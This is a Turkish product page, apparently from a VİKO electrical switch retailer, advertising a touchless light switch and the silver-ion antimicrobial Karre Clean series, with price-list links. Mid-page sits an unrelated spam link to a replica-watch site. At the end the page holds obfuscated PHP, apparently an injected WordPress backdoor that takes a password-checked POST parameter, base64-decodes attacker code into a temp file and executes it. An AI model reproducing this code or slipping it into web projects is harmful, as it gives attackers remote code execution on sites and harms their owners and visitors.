Viko Fiyat Listeleri

VİKO ürün ailesinin en son üyelerinden Touchless Temassız Anahtar ile tanışın!

Touchless Temassız Anahtarlar, VİKO’nun imza markalarından
Karre / Meridian serilerinde... VİKO ailesinin yeni ürünü olan Touchless Temassız Anahtar, özellikle ortak alanlarda herhangi bir temasa ihtiyaç duymadan aydınlatmaları kontrol edebilme imkânı sunuyor. Temastan kaçınılan ortamlarda Touchless Temassız Anahtar ile artık gönül rahatlığıyla aydınlatmalar açılıp, kapatılabilecek.

Sağlık ve hijyen için, elektrik anahtarlarına dokunmadan açıp, kapatmaya ne dersiniz? Touchless, temassız teknolojisiyle yaşam alanlarında alışkanlıkları değiştirmek için tasarlandı. Ona sadece elinizi yaklaştırın, açılsın. Tekrar yaklaştırın, kapansın. Temassız konfor için Touchless ile tanışın, elektrik anahtarlarıyla aranızda mesafe bırakın.

Gelsin Karre Clean gitsin bakteriler

Daha sağlıklı ve temiz bir yaşam için Karre Clean… Hemen her gün temas ettiğimiz alanların bakterilere karşı korumalı olduğunu hayal edin. Karre Clean böyle bir fikirden doğdu. Antimikrobiyel Karre Clean, Gümüş (Ag+) iyonları ile bakterilere karşı korunmaktadır

Karre Clean, yüzeyinde bakteri tutmaz!

  • Gümüş iyonlarıyla bakterilere karşı koruma,
  • Mikroorganizmaların çoğalmasının engellenmesi ile daha hijyenik yüzeyler,
  • Işığa ve sıcaklığa karşı dayanıklılık.

Temizlik Karre Clean’de...

İçeride ve dışarıda kendimizi ve sevdiklerimizi koruma konusunda çok dikkatliyiz. Gümüş iyon i.eren Karre Clean, sadece ev, ofis, okul, hastane gibi özel alanlar i.in değil tüm kamu alanları ve kişisel alanlar için güvenli çözümler sunuyor.

https://www.high-endrolex.com/5

Hijyen Karre Clean’de...

Gümüş iyonlar hem gram pozitif hem de gram negatif bakterilere karşı etkindir. Günlük hayatımızda, farkında olmadan dokunduğumuz yüzeylerdeki mikroorganizmalarla sürekli temas halindeyiz. Bu yüzeylerdeki mikroorganizmalar sürekli olarak çoğalmakta ve hijyeni tehdit etmektedir. Gümüş iyon içeren Karre Clean ile ürünlerimiz mikroorganizmalara karşı korunmakta ve yüzeyler hijyenik ve güvenli hale gelmektedir.

Sağlıklı çözümler Karre Clean’de...

Bakteri karşıtı Karre Clean, şık ve yalın tasarımıyla bu özelliğinin altını çiziyor. Hijyenden taviz vermeyenlere zengin fonksiyon seçenekleri sunuyor

Viko Fiyat Listesi 2023 - 2

Viko Fiyat Listesi 2024 - 1

Size en iyi hizmeti sunabilmek için sitemizde çerez kullanılmaktadır. Detaylı bilgi için Çerez Politikası sayfamızı inceleyebilirsiniz.
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}